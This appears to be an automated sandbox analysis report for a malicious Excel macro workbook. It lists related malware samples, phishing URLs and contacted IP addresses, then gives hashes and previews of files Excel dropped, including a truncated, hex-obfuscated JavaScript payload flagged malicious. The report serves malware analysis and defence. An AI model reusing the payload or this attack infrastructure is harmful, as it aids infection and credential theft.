                                                                                                                                                                                          6271f898ce5be7dd52b0fc260d0662b3https://ngkerk.net/?mailpoet_router&endpoint=track&action=click&data=WyI2ODQzIiwiMmxoNXIzbHo5czg0MGs0ZzRvd2d3NGN3Y3NzY3NnY2siLCI0IiwiYjA5YjViM2UwNTQ2IixmYWxzZV0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          ATT00001.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          https://itservicedesk.brizy.siteGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          https://linkpop.com/custom9392Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          https://ref-securedrvx.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          SecuriteInfo.com.Win32.Malware-gen.29376.15776.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          RE_ Stonhard Quote 10346251 for St. Mark Coptic Church prepared for Albion by Kevin KranickGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          Deposit.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          Reserva_Detalhes.ppamGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          d#U044f.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          Bank_Account_Details.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          Reserva_Cancelar.ppamGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          https://widget2.de.shop.pl-x.de/shop/ihre-downloads/?tx_conshop_download%5Baction%5D=list&tx_conshop_download%5Bcontroller%5D=Download&tx_conshop_download%5Border%5D=378bd875e76c7e32e875e375eacb720b9c09b02ec0f642db5652b30acd30651a&cHash=20eaf7fa7f68bdd9f973bd98a79af7e7)Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          Reserva.ppamGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          TLS-Check.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          estatment6501497976.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          Remittance Advice ref. n#U00b0 1452028 dated 31.10.2023.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          Final-Scanned.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          https://msofficemail.mrdvlvdrgy.com/owa/wasrf/wsignin/rpsnv/ct/1694585354/rver7/wp/MBISSL/wreply/apps.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 185.199.111.133
                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1Comprobante.xllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          Comprobante_de_Pago.xllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          Comprobante.xllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          23089163_Concession_Form_RRC_Plug_Weld.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          Comprobante_de_Pago.xllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                                                                                                                                                          • 13.107.219.40
                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19rFnxSwThhn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          rFnxSwThhn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          nota-emitida-71515474-50633616729.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          Liquidacion_por_Factorizcion_de_Creditos.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          Shipping_doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          ZmWSzgevgt.exeGet hashmaliciousNetSupport RAT, LummaC StealerBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          dasveed.bin.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          ZmWSzgevgt.exeGet hashmaliciousNetSupport RAT, LummaC StealerBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          dasveed.bin.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          nf.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          Additional information for Hotel_patched.scrGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          krj2UH1P3A.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          krj2UH1P3A.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          SDFormatter.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.70689352.25194.12145.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          Unshuang_po110437.exeGet hashmaliciousAZORultBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          Liquidaci_n_por_Factorizaci_n_de_Cr_ditosPDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                          • 190.123.45.87
                                                                                                                                                                                          • 217.197.91.145
                                                                                                                                                                                          • 34.117.59.81
                                                                                                                                                                                          No context
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):8153
                                                                                                                                                                                          Entropy (8bit):6.613325538907496
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:33E9QiikUqT8GqDkLfWnRSGeZGaP9Ul+c6+du8jf6UWTVUwhzQ8CpSAdHOnNZAu8:poUqFfISGeQaFUlbVvevUqzQXpS08nah
                                                                                                                                                                                          MD5:1817A8856ED5AF447F8337AADCEF4EBE
                                                                                                                                                                                          SHA1:9F104C79AAD90CBA5E1BDBE5FCF46EAC28005832
                                                                                                                                                                                          SHA-256:0B73138DF8E74330FFA0AA52670AE589B9C7CBBE7D51457F25C6EEFF8F4FEE6E
                                                                                                                                                                                          SHA-512:ACF4A52CF6BD5604D63F4CB3BA399F038987897737A15B11164C9C04033F274845C0F752BF353BC6FE1A8AA162023CCF4519CE22F431684293EF4B78AE236A5F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:PK..........!..S..N...........[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5....(.`.Ib./y...=...@..j7.b..s=3..6..k......X...J..b.......S.x........f.......V.K)<..u.V"....4>Z..7.".z)[......K.R.z.6..@#W&.....9.`.....U1...L.T...E)..N.9.;...l01H.O....>.4Q+(.2.wi.........%?-2..7..A.ze...C....H..r+.;.>...(.2....~Y...D.....[.2g......e....y..ir#..~..>..$.1i8..P..D.......R..."...........PK..........!..U0#....L......._rels/.rels ...(...................................................
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):8153
                                                                                                                                                                                          Entropy (8bit):6.613325538907496
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:33E9QiikUqT8GqDkLfWnRSGeZGaP9Ul+c6+du8jf6UWTVUwhzQ8CpSAdHOnNZAu8:poUqFfISGeQaFUlbVvevUqzQXpS08nah
                                                                                                                                                                                          MD5:1817A8856ED5AF447F8337AADCEF4EBE
                                                                                                                                                                                          SHA1:9F104C79AAD90CBA5E1BDBE5FCF46EAC28005832
                                                                                                                                                                                          SHA-256:0B73138DF8E74330FFA0AA52670AE589B9C7CBBE7D51457F25C6EEFF8F4FEE6E
                                                                                                                                                                                          SHA-512:ACF4A52CF6BD5604D63F4CB3BA399F038987897737A15B11164C9C04033F274845C0F752BF353BC6FE1A8AA162023CCF4519CE22F431684293EF4B78AE236A5F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:PK..........!..S..N...........[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5....(.`.Ib./y...=...@..j7.b..s=3..6..k......X...J..b.......S.x........f.......V.K)<..u.V"....4>Z..7.".z)[......K.R.z.6..@#W&.....9.`.....U1...L.T...E)..N.9.;...l01H.O....>.4Q+(.2.wi.........%?-2..7..A.ze...C....H..r+.;.>...(.2....~Y...D.....[.2g......e....y..ir#..~..>..$.1i8..P..D.......R..."...........PK..........!..U0#....L......._rels/.rels ...(...................................................
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3471505
                                                                                                                                                                                          Entropy (8bit):3.2415913316608447
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:OPvjvgyIrhhaFl2MTKAt+ja+wHFHL9jV5UM7jLOiC6XxCXhiRoZiRoCDj1dgN1BL:N
                                                                                                                                                                                          MD5:91513040D5722E04F3075B524C3F8D9D
                                                                                                                                                                                          SHA1:FAC5133804E5FA98B7078B2BD08B03DACD4ECED0
                                                                                                                                                                                          SHA-256:C92F42D672E9EDD78BDF87EB21216B90607BC4E1057C3093B0B39A95CF83F5A7
                                                                                                                                                                                          SHA-512:0C7B005F924DDB68CF1CD782CCBC43733D0B101A3AD4126944ACCF49A76E59891F070BA605697C811B687490BF243C2F1FBE206D9092530EDE16EEE4CB089E20
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:try{var ZTVHDHOKAKY = ["\x49\x48\x5A\x68\x63\x69\x42\x4E\x56\x31\x42\x59\x52\x55\x52\x53\x54\x56\x56\x4E\x50\x56\x73\x69\x49\x69\x77\x69\x4B\x6B\x70\x4E\x49\x57\x5A\x49\x5A\x54\x59\x74\x66\x6C\x6F\x70\x64\x48\x6C\x26\x50\x23\x4A\x6B\x58\x6A\x42\x6F\x4A\x57\x64\x4D\x64\x55\x73\x60\x50\x55\x6B\x79\x51\x56\x77\x69\x4C\x46\x78\x63\x56\x48\x67\x6A\x4A\x69\x41\x31\x4F\x6D\x74\x69\x4F\x32\x39\x6A\x57\x33\x4A\x56\x52\x48\x4E\x54\x54\x32\x6F\x34\x59\x46\x42\x37\x56\x32\x45\x78\x4A\x43\x60\x44\x4C\x7A\x34\x26\x52\x6B\x55\x33\x52\x33\x31\x36\x56\x6C\x46\x70\x62\x69\x74\x66\x4D\x33\x42\x33\x4B\x45\x42\x53\x54\x6D\x23\x6E\x62\x48\x46\x5A\x64\x6C\x67\x23\x58\x53\x49\x73\x49\x6E\x4A\x56\x49\x7A\x6C\x72\x62\x79\x55\x2F\x54\x69\x74\x6F\x4A\x33\x68\x44\x4C\x23\x64\x59\x5A\x7A\x73\x7A\x4C\x56\x41\x32\x56\x45\x6C\x46\x5A\x57\x4E\x61\x4F\x69\x6F\x39\x5A\x48\x64\x54\x61\x55\x51\x2B\x54\x48\x6C\x49\x4F\x46\x77\x69\x4E\x33\x56\x68\x58\x46\x78\x73\x52\x6A\x51\x26\x63\x57\x34\x77\x49\x45\x6F\x6D\x66\x46\x46\x41
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (1869), with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1869
                                                                                                                                                                                          Entropy (8bit):5.082163207271108
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:cGwdySdyddSyrIdnzyvSyr0nzyKJdynkSyrLnzyrTnzy5ASyBdyO:IESEddbUd2vbg2cEkbv2P25AbBEO
                                                                                                                                                                                          MD5:620D4095218CA775D66F049C64DB3E0F
                                                                                                                                                                                          SHA1:25691E32837F1D221B65521AC5CCC360BA4F7135
                                                                                                                                                                                          SHA-256:CBA8445010C18C3E18DC995357C811B5454D8683A552CCEFC4AF73E634801A2E
                                                                                                                                                                                          SHA-512:7705EBA5DCF2D6F57D8259AE8869E9380C34254F8EF9C861E06A39A9A4C511DC74205E8FEDB7572A81ABACDFD7FEAE8D26C6C6BCB97EB1F2A8E27B445655388B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>12</Count><Resource><Id>Aptos_26215680</Id><LAT>2023-12-06T17:16:17Z</LAT><key>29939506207.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos_45876480</Id><LAT>2023-12-06T17:16:17Z</LAT><key>27160079615.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_26215424</Id><LAT>2023-12-06T17:16:17Z</LAT><key>31558910439.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215680</Id><LAT>2023-12-06T17:16:17Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-12-06T17:16:17Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos Display_45876480</Id><LAT>2023-12-06T17:16:17Z</LAT><key>30264859306.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos_
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):520128
                                                                                                                                                                                          Entropy (8bit):4.90769541415434
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:o2VbOSb3F2Fq9VMjNYof+pmpnGDubTxZO7aYb6f5780K2:RbOq3OjNymtGyT
                                                                                                                                                                                          MD5:3B91B07226DA43AA3096B72358BFB5E0
                                                                                                                                                                                          SHA1:92D98CB137664D5943790FD725495B3B2DF74CD1
                                                                                                                                                                                          SHA-256:31E98819C6C7183E67326D60DFD074BD54CD670D8A6D3E283BBD4CB12E047723
                                                                                                                                                                                          SHA-512:105D2B3522DD64DE3A7D4642347F5684FEC33A4C329601A6BED191BF594DC170AEF457098CA5817E371FC998E0F6AE5A8BB7210488A1E4B31ACA89F3302BD77F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:{"MajorVersion":4,"MinorVersion":38,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_38RegularVersion 4.38;O365
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):767532
                                                                                                                                                                                          Entropy (8bit):6.559134031163703
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:Sn84XUdLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/yLQ/zlm1kjFKy6Nyjbqq+:O8XNDs5+ivOXgm1kYvyz2
                                                                                                                                                                                          MD5:CBF459234D8EDB73A82FDF3DBAA457E4
                                                                                                                                                                                          SHA1:B249128952BCDD90CB21414E12E51DE0AE601595
                                                                                                                                                                                          SHA-256:5C008CE19DEAFA53AB1594FA7F048FDC822BCF44589E24A16429D95BD046F5F9
                                                                                                                                                                                          SHA-512:946468D7608BD513F42B915B79E67D9B39385AB705F0E9E41C72DADD8AB117337E6AC3862E9EAA1B32B0D47BF8FCCD671E5F72A65C8811CE3E71E9BAE0C6CA5C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:........... OS/29....(...`cmap.s.(.......pglyf..&?...\....head1.R........6hheaE.@r.......$hmtxr..........0loca.+.....(...4maxp........... name.W+.........post...<....... .........0.._.<...........<............Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................l......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                          MD5:BB7DF04E1B0A2570657527A7E108AE23
                                                                                                                                                                                          SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                                                                                                                                                                                          SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                                                                                                                                                                                          SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):93
                                                                                                                                                                                          Entropy (8bit):5.131120092886621
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:aznHTt/BIlxDMCuOT6MWlxxAaWViGtApR7ll:aznHTt/SxDMbOGlAa7tpR7/
                                                                                                                                                                                          MD5:81A80AB550AEF02105DF4905DB8EF918
                                                                                                                                                                                          SHA1:01C9A1FD8F0AF424DE7B753DFB88E2DC04A816B1
                                                                                                                                                                                          SHA-256:CC9A63B45E7E0560AC214106B16BF52B9052F2671D9452E271171A25B7DC8829
                                                                                                                                                                                          SHA-512:1B354A5EBC9C0BAEE91E6509D7B492095C619B368A2CF33D64B10729A1B56FC6B389CF9F600EC0B155A55C6CD01306C61F89872878F8457ABE6F5FA0C16C6B94
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:S.lb.DS....Q.bT.9H...........file:///C:\Users\user\Desktop\..Techspan%20Statement..xlsm.....
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65
                                                                                                                                                                                          Entropy (8bit):4.968070505136444
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:OX/Ml811J87pMceLxn:qck1GRe9n
                                                                                                                                                                                          MD5:E376B17A941F03ADB4AF49A1F4DAE5EA
                                                                                                                                                                                          SHA1:6E41A10C89525A32D5A34DEBF3ADEF9196EC344F
                                                                                                                                                                                          SHA-256:C4C275791FA1D9322A74BF9EEA04E51329F6FB26E8D2780DADE2C50233134E2A
                                                                                                                                                                                          SHA-512:71CB669F97567CB0B6B5806D8A5817EC1BCBC02FB52A1BA6CF7AECADE0D78C5607FD71E57C1127809FF5FEBB98C65CC999D0C94D84678DEAF93CB7B7C9BE0E00
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:S.@...7....5..z..,............file:///C:\..9YMF2RVFA4BY..xlsx...
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):37
                                                                                                                                                                                          Entropy (8bit):3.511811638246966
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:hUiyHZ19X:C7L9
                                                                                                                                                                                          MD5:36C2B1CED60EFAD55C7180009F22541D
                                                                                                                                                                                          SHA1:22B51215C3FAB6BD0D8987E7DA066EDD9172E7AE
                                                                                                                                                                                          SHA-256:9BC8F459C8746153969296FDCA53DCAC8E96A5C3DD649126F2844EBB44642517
                                                                                                                                                                                          SHA-512:E0B56260898857017174302F29AAE13DD7433D4DF66399A7232677C2FE4A0B2BB3FC4D5C191A001B4B4DEB3C4C7D17F78030053A7C74476F784C6758C013E05C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:S...&..........._...................
                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):163490
                                                                                                                                                                                          Entropy (8bit):5.343309800186777
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:Q+C7FPgOXB3U9guwwJQ9DQA+zez0Qtk4F77nXmvid8XRTEwr/j6T:oIQ9DQA+zezoXex
                                                                                                                                                                                          MD5:B8B185B2AABFCA33B166254A24295924
                                                                                                                                                                                          SHA1:0D646CEFB27E94326479432F87E0250172D5E321
                                                                                                                                                                                          SHA-256:A937CF714AF21D66B35E97BD325ADDF7F57871F1BD39C1F775A132EB568CB6FD
                                                                                                                                                                                          SHA-512:2EB0D21A12B3C04783B0767115B15AA3008B5E5FEF8C0BBF99D0CADE06A42D9DF186399B3DA97788E55A1394E3AA12C6EAB3AFA88A1BC90EB05B7A06C705A526
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-12-06T17:16:18">.. Build: 16.0.17204.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU
